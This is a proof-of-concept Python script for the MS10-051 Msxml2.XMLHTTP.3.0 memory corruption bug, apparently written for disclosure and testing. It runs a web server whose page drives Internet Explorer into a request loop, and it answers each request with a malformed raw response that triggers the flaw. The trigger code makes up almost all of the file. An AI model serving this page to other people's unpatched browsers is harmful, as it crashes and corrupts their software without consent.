Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)
Posted on 10 August 2010
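# =================================================================
# Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)
# =================================================================
# Sources:
# http://skypher.com/index.php/2010/08/10/ms10-051/
# http://code.google.com/p/skylined/issues/detail?id=17
#
# Proof of concept. A minimal HTTP server serves a landing page whose
# script makes Internet Explorer issue synchronous Msxml2.XMLHTTP.3.0
# requests in a tight loop; every one of those requests is answered with
# the deliberately malformed raw response 'HTTP 4 ' (no valid status
# line, no headers), which is what exercises the response-handling bug
# fixed by MS10-051. Start the script, then open the printed URL in the
# browser under test. Nothing from the request is reflected back, so the
# server itself takes no untrusted input beyond the request line.
#
# NOTE(review): the archived copy of this script lost its backslashes in
# transcription -- the path regex read 'd+' (never matching, so the XHRs
# only ever received a 404 and the PoC could not trigger) and the header
# separator had become a bare space. They are restored below as
# '\?' / '\d+' and '\r\n'. The trailing characters of the malformed
# reply string may have been trimmed the same way; it is kept as found.
import os
import re
import socket

webserver_port = 28876
# '' binds every interface, which is what the original did. Only leave
# it that way when the browser under test is on another host; otherwise
# use '127.0.0.1' so the crash page is not reachable by anyone else on
# the network. Stop the server as soon as the test is done.
webserver_host = ''

# Landing page: drives the XMLHTTP request loop. Each iteration fetches
# /RandomHTTP?counter=N synchronously (third open() argument false) and
# reschedules itself via setTimeout so the loop survives a single
# successful response.
_LANDING_PAGE = """
<SCRIPT>
iCounter = 0
function go() {
    var request_url = location.protocol + "//" + location.host + "/RandomHTTP?counter=" + (iCounter++);
    var xml_http_request = new ActiveXObject("Msxml2.XMLHTTP.3.0");
    xml_http_request.open("GET", request_url, false);
    xml_http_request.send();
    setTimeout(go, 1);
}
go();
</SCRIPT>
"""

# path regex -> reply. A str reply is sent verbatim as the raw response
# (this is how the malformed reply is produced); a (mime_type, body)
# tuple becomes a normal 200 response; a callable is called with the
# path and must return (code, reason, mime_type, body).
replies = {
    r'^/$': ('text/html', _LANDING_PAGE),
    r'^/RandomHTTP\?counter=\d+$': 'HTTP 4 ',
}


def _parse_path(request):
    """Return the request-target of a 'GET ' request line, else None.

    Only the first 1024 bytes of the request are ever read, and only the
    method and target are looked at; everything else is ignored.
    """
    if request[:4] != 'GET ':
        return None
    end_path = request.find(' ', 4)
    if end_path == -1:
        return None
    return request[4:end_path]


def build_response(path, replies=replies):
    """Build the raw response for *path*.

    Returns (response, mime_type). *path* may be None (unparseable
    request), which yields a 404. The first matching pattern in *replies*
    wins; the patterns here are anchored and disjoint, so dict order does
    not matter. mime_type is only meaningful for generated responses and
    stays 'text/plain' for a verbatim str reply -- it is reported in the
    log line for that case just as the original did.
    """
    code, reason, mime_type, body = 404, 'Not found', 'text/plain', 'Not found'
    if path is not None:
        for path_regexp, reply in replies.items():
            if not re.match(path_regexp, path):
                continue
            if isinstance(reply, str):
                # Raw reply: sent exactly as written, no headers added.
                return reply, mime_type
            if isinstance(reply, tuple):
                code, reason = 200, 'OK'
                mime_type, body = reply
            else:
                code, reason, mime_type, body = reply(path)
            break
    # Fixed past Date/Expires plus no-cache headers keep IE from serving
    # the landing page from cache on a re-run.
    lines = [
        'HTTP/1.1 %03d %s' % (code, reason),
        'Content-Type: %s' % mime_type,
        'Date: Sat Aug 28 1976 09:15:00 GMT',
        'Expires: Sat Aug 28 1976 09:15:00 GMT',
        'Cache-Control: no-cache, must-revalidate',
        'Pragma: no-cache',
        'Accept-Ranges: bytes',
        'Content-Length: %d' % len(body),
        '',
        body,
    ]
    return '\r\n'.join(lines), mime_type


def _handle_client(client_socket):
    """Read one request from *client_socket*, log it and send the reply.

    Errors on the socket are logged (recv) or ignored (send) and never
    propagate, mirroring the original best-effort behaviour; the caller
    is responsible for closing the socket.
    """
    try:
        # latin-1 round-trips any byte, so a binary junk request cannot
        # raise a decode error here.
        request = client_socket.recv(1024).decode('latin-1')
    except socket.error:
        print('>> ??')
        return
    print('>> ' + request.split(' ')[0])
    response, mime_type = build_response(_parse_path(request))
    print('<< %s (%d bytes %s)' % (response.split(' ')[0], len(response), mime_type))
    try:
        # sendall, not send: a partial write would truncate the page.
        client_socket.sendall(response.encode('latin-1'))
    except socket.error:
        pass


def serve(host=webserver_host, port=webserver_port):
    """Run the PoC web server forever on (host, port).

    Single-threaded, one connection at a time; each client socket is
    closed even when recv fails (the original leaked it on that path).
    Raises socket.error if the port cannot be bound.
    """
    server_socket = socket.socket()
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((host, port))
    server_socket.listen(1)
    print('Webserver running at http://localhost:%d/' % port)
    try:
        while True:
            client_socket, _ = server_socket.accept()
            try:
                _handle_client(client_socket)
            finally:
                client_socket.close()
    finally:
        server_socket.close()


if __name__ == '__main__':
    serve()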